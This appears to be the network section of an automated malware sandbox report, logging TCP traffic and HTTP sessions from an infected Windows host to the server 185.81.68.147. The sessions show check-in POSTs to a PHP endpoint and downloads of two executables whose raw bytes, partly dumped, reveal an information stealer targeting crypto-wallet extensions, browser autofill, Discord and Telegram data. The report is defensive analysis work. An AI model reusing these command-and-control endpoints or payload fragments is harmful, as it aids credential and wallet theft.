                                                                                                                                                                                                                      Dec 15, 2024 09:17:25.025145054 CET4986880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:25.041224957 CET8049864185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:25.144865990 CET8049868185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:25.144975901 CET4986880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:25.145057917 CET4986880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:25.264750957 CET8049868185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:25.264854908 CET4986880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:25.384655952 CET8049868185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:26.589452028 CET8049868185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:26.590033054 CET8049868185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:26.590087891 CET4986880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:26.590862989 CET4986880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:26.697125912 CET4987180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:26.710735083 CET8049868185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:26.817318916 CET8049871185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:26.817394018 CET4987180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:26.817475080 CET4987180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:26.937236071 CET8049871185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:26.937372923 CET4987180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:27.057566881 CET8049871185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:28.437232018 CET8049871185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:28.437397957 CET8049871185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:28.437653065 CET4987180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:28.438811064 CET4987180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:28.540704966 CET4987780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:28.558474064 CET8049871185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:28.660537958 CET8049877185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:28.660671949 CET4987780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:28.660773993 CET4987780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:28.780493021 CET8049877185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:28.780580044 CET4987780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:28.900331020 CET8049877185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:30.106364965 CET8049877185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:30.106383085 CET8049877185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:30.106457949 CET4987780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:30.108316898 CET4987780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:30.214051962 CET4987880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:30.228154898 CET8049877185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:30.334117889 CET8049878185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:30.334233999 CET4987880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:30.346568108 CET4987880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:30.466722965 CET8049878185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:30.466931105 CET4987880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:30.586920023 CET8049878185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:31.949158907 CET8049878185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:31.949281931 CET8049878185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:31.949331999 CET4987880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:31.950638056 CET4987880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:32.056428909 CET4988480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:32.070352077 CET8049878185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:32.176474094 CET8049884185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:32.176567078 CET4988480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:32.176670074 CET4988480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:32.296375036 CET8049884185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:32.296473980 CET4988480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:32.416352034 CET8049884185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:33.620358944 CET8049884185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:33.620438099 CET8049884185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:33.620491982 CET4988480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:33.621813059 CET4988480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:33.731617928 CET4988580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:33.741667986 CET8049884185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:33.851594925 CET8049885185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:33.851722002 CET4988580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:33.851774931 CET4988580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:33.971745014 CET8049885185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:33.971862078 CET4988580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:34.091759920 CET8049885185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:35.467638016 CET8049885185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:35.467685938 CET8049885185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:35.467775106 CET4988580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:35.469166994 CET4988580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:35.571938992 CET4989180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:35.588924885 CET8049885185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:35.691860914 CET8049891185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:35.691936016 CET4989180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:39.076564074 CET4989180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:39.196337938 CET8049891185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:39.196396112 CET4989180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:39.316433907 CET8049891185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:39.816704988 CET8049891185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:39.816847086 CET8049891185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:17:39.817441940 CET4989180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:39.817532063 CET4989180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:17:39.937263012 CET8049891185.81.68.147192.168.2.8

                                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                                      • 185.81.68.147

                                                                                                                                                                                                                      HTTP Packets

                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      0192.168.2.849705185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:15:30.391606092 CET259OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Dec 15, 2024 09:15:31.718343019 CET257INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:15:31 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 40
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Data Raw: 63 65 63 31 39 39 64 32 37 62 39 34 61 65 63 31 34 31 64 31 65 64 36 39 34 61 61 37 61 34 31 62 34 66 35 35 64 34 39 63
                                                                                                                                                                                                                      Data Ascii: cec199d27b94aec141d1ed694aa7a41b4f55d49c


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      1192.168.2.849706185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:15:31.864586115 CET279OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 37
                                                                                                                                                                                                                      Dec 15, 2024 09:15:31.984522104 CET37OUTData Raw: 01 0a 17 4d 0b 17 51 4e 06 52 45 04 1d 55 1f 01 48 79 31 73 20 36 62 14 64 22 1d 5f 14 56 54 10 40 1a 04 49 5d
                                                                                                                                                                                                                      Data Ascii: MQNREUHy1s 6bd"_VT@I]
                                                                                                                                                                                                                      Dec 15, 2024 09:15:33.473016024 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:15:32 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      2192.168.2.849707185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:15:33.596544027 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:15:33.716837883 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:15:35.038561106 CET315INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:15:34 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 98
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Data Raw: 53 19 0b 45 4d 49 5e 1d 18 53 01 01 4f 5d 52 1f 02 09 4a 00 51 53 19 4a 47 06 4f 52 19 51 3c 68 04 1a 5d 41 10 44 03 4c 4c 54 5b 04 17 01 55 1c 01 5a 17 05 55 52 4c 4b 4c 1f 01 49 00 69 3c 08 48 09 15 43 11 0e 1e 4d 05 5e 00 1b 5c 05 17 55 5b 4b 52 05 0e 16 11 42 53 03 4d 51 4f 00 1b 54 39 3b
                                                                                                                                                                                                                      Data Ascii: SEMI^SO]RJQSJGORQ<h]ADLLT[UZURLKLIi<HCM^\U[KRBSMQOT9;


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      3192.168.2.849708185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:15:35.188565016 CET232OUTGET /ssg.exe HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.515755892 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:15:35 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      Last-Modified: Thu, 12 Dec 2024 10:50:51 GMT
                                                                                                                                                                                                                      ETag: "4b200-629107cd804d2"
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Content-Length: 307712
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: application/x-msdownload
                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 02 03 00 4f 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELH(0 @ @<O H.text `.rsrc @@.reloc@BpH (wautofill5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.515840054 CET1236INData Raw: 39 00 6c 00 61 00 47 00 78 00 6c 00 5a 00 6d 00 35 00 72 00 62 00 32 00 52 00 69 00 5a 00 57 00 5a 00 6e 00 63 00 47 00 64 00 72 00 62 00 6d 00 35 00 38 00 54 00 57 00 56 00 30 00 59 00 57 00 31 00 68 00 63 00 32 00 73 00 4b 00 59 00 57 00 5a 00
                                                                                                                                                                                                                      Data Ascii: 9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Np
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.515877962 CET1236INData Raw: 62 00 32 00 31 00 69 00 59 00 58 00 51 00 4b 00 5a 00 6d 00 68 00 70 00 62 00 47 00 46 00 6f 00 5a 00 57 00 6c 00 74 00 5a 00 32 00 78 00 70 00 5a 00 32 00 35 00 6b 00 5a 00 47 00 74 00 71 00 5a 00 32 00 39 00 6d 00 61 00 32 00 4e 00 69 00 5a 00
                                                                                                                                                                                                                      Data Ascii: b21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.515913010 CET1236INData Raw: 31 00 6c 00 61 00 57 00 31 00 6f 00 62 00 48 00 42 00 74 00 5a 00 32 00 70 00 75 00 61 00 6d 00 39 00 77 00 61 00 47 00 68 00 77 00 61 00 32 00 74 00 76 00 62 00 47 00 70 00 77 00 59 00 58 00 78 00 51 00 61 00 47 00 46 00 75 00 64 00 47 00 39 00
                                                                                                                                                                                                                      Data Ascii: 1laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhProfilesSOFTWASkyBoxRE\MicrSkyBoxosoft\WinSkyBoxdows NT\CurrentVersSky
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.515948057 CET1236INData Raw: e2 25 0c bc 3c 49 8b 28 0d 95 41 ff a8 01 71 39 0c b3 de 08 b4 e4 9c d8 56 c1 90 64 cb 84 61 7b 32 b6 70 d5 6c 5c 74 48 b8 57 42 d0 54 00 6f 00 74 00 61 00 6c 00 20 00 6f 00 66 00 20 00 52 00 41 00 4d 00 45 00 78 00 65 00 63 00 75 00 74 00 61 00
                                                                                                                                                                                                                      Data Ascii: %<I(Aq9Vda{2pl\tHWBTotal of RAMExecutablePathRj068@|9/4CDT{2#=LBN.f($v[Im%rdh\]elpHP^FWXE,?k:AOg
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.515984058 CET1236INData Raw: 37 d3 e4 e4 8b f2 79 79 32 d5 e7 e7 43 8b c8 c8 59 6e 37 37 b7 da 6d 6d 8c 01 8d 8d 64 b1 d5 d5 d2 9c 4e 4e e0 49 a9 a9 b4 d8 6c 6c fa ac 56 56 07 f3 f4 f4 25 cf ea ea af ca 65 65 8e f4 7a 7a e9 47 ae ae 18 10 08 08 d5 6f ba ba 88 f0 78 78 6f 4a
                                                                                                                                                                                                                      Data Ascii: 7yy2CYn77mmdNNIllVV%eezzGoxxoJ%%r\..$8WsQ#|tt!>KKappB|>>qffHHaa_j55WWiX':'8+3"iip3-"<
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.516222000 CET1236INData Raw: fc 82 ca a6 e0 90 d0 b0 33 a7 d8 15 f1 04 98 4a 41 ec da f7 7f cd 50 0e 17 91 f6 2f 76 4d d6 8d 43 ef b0 4d cc aa 4d 54 e4 96 04 df 9e d1 b5 e3 4c 6a 88 1b c1 2c 1f b8 46 65 51 7f 9d 5e ea 04 01 8c 35 5d fa 87 74 73 fb 0b 41 2e b3 67 1d 5a 92 db
                                                                                                                                                                                                                      Data Ascii: 3JAP/vMCMMTLj,FeQ^5]tsA.gZRV3mGa7zY<'a5zG<YUs?ys7S_[=oxDh>8$4,@_r%(<IA9qdV{a2pHl\tWB/SolutionC
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.516274929 CET1236INData Raw: ce 49 87 ce 55 ff aa 55 28 78 50 28 df 7a a5 df 8c 8f 03 8c a1 f8 59 a1 89 80 09 89 0d 17 1a 0d bf da 65 bf e6 31 d7 e6 42 c6 84 42 68 b8 d0 68 41 c3 82 41 99 b0 29 99 2d 77 5a 2d 0f 11 1e 0f b0 cb 7b b0 54 fc a8 54 bb d6 6d bb 16 3a 2c 16 50 00
                                                                                                                                                                                                                      Data Ascii: IUU(xP(zYe1BBhhAA)-wZ-{TTm:,Profile_FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV0CmFpaWZi
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.516310930 CET1236INData Raw: 5a 00 32 00 56 00 74 00 61 00 6d 00 4a 00 71 00 59 00 32 00 46 00 38 00 51 00 6d 00 39 00 73 00 64 00 46 00 67 00 4b 00 61 00 33 00 42 00 6d 00 62 00 33 00 42 00 72 00 5a 00 57 00 78 00 74 00 59 00 58 00 42 00 6a 00 62 00 32 00 6c 00 77 00 5a 00
                                                                                                                                                                                                                      Data Ascii: Z2VtamJqY2F8Qm9sdFgKa3Bmb3BrZWxtYXBjb2lwZW1mZW5kbWRjZ2huZWdpbW58TGlxdWFsaXR5V2FsbGV0CmhtZW9ibmZuZmNtZGtkY21sYmxnYWdtZnBmYm
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.516345978 CET1236INData Raw: 61 00 57 00 31 00 75 00 66 00 45 00 78 00 70 00 63 00 58 00 56 00 68 00 62 00 47 00 6c 00 30 00 65 00 56 00 64 00 68 00 62 00 47 00 78 00 6c 00 64 00 41 00 70 00 6f 00 62 00 57 00 56 00 76 00 59 00 6d 00 35 00 6d 00 62 00 6d 00 5a 00 6a 00 62 00
                                                                                                                                                                                                                      Data Ascii: aW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaW
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.635782957 CET1236INData Raw: 70 00 76 00 53 00 45 00 4c 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 00 49 00 6e 00 66 00 6f 00 45 00 43 00 54 00 20 00 2a 00 20 00 46 00 52 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 00 49 00 6e 00 66 00 6f 00 4f 00 4d 00 20 00 57 00 69 00 6e 00
                                                                                                                                                                                                                      Data Ascii: pvSELProcessInfoECT * FRProcessInfoOM Win32_PrProcessInfoocess%appdata%\discord\Local Storage\leveldb\tdatav10 MB or


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      4192.168.2.849709185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.800906897 CET231OUTGET /zx.exe HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.133486986 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:15:38 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      Last-Modified: Sat, 14 Dec 2024 13:10:00 GMT
                                                                                                                                                                                                                      ETag: "5a4536-6293aaa2cd4c8"
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Content-Length: 5915958
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: application/x-msdownload
                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 a8 83 5d 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 dd 61 [TRUNCATED]
                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$XhcXhcXhc`_hcfhcgRhc[hc`QhcgIhcfphcbShcXhbhcKgAhcKaYhcRichXhcPEd]g"(X@aZ`lx`"h@P.text `.rdataB&(@@.datas@.pdata"`$@@.rsrc@@.reloch@B
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.133511066 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                      Data Ascii: H(/H'HHHHHH($HqCH\$Hl$ LD$VWATAUAWH H3HDIHA.L
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.133677006 CET1236INData Raw: 48 85 c0 75 15 48 8d 56 12 48 8d 0d da a7 02 00 e8 4d 15 00 00 e9 02 01 00 00 8b 56 04 45 33 c0 48 03 93 00 10 00 00 49 8b cc e8 37 e9 00 00 85 c0 79 1c 4c 8d 46 12 48 8d 15 e4 a7 02 00 48 8d 0d 19 a8 02 00 e8 88 16 00 00 e9 af 00 00 00 8b 4e 0c
                                                                                                                                                                                                                      Data Ascii: HuHVHMVE3HI7yLFHHN0LHu DNLFHHX~uME3HIW^Lt$PMHt; DH;HMAHGIH^HrhL H+uH|$`Lt$Pt
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.133738995 CET1236INData Raw: 48 48 8b 6c 24 40 4c 8b 64 24 50 85 c0 74 0b 49 8b ce e8 e3 2b 01 00 45 33 f6 49 8b cf e8 e8 dd 00 00 48 8b 5c 24 58 49 8b c6 48 83 c4 20 41 5f 41 5e 5e c3 4c 8d 46 12 48 8d 15 57 a2 02 00 48 8d 0d 84 a2 02 00 e8 b3 11 00 00 b8 ff ff ff ff eb aa
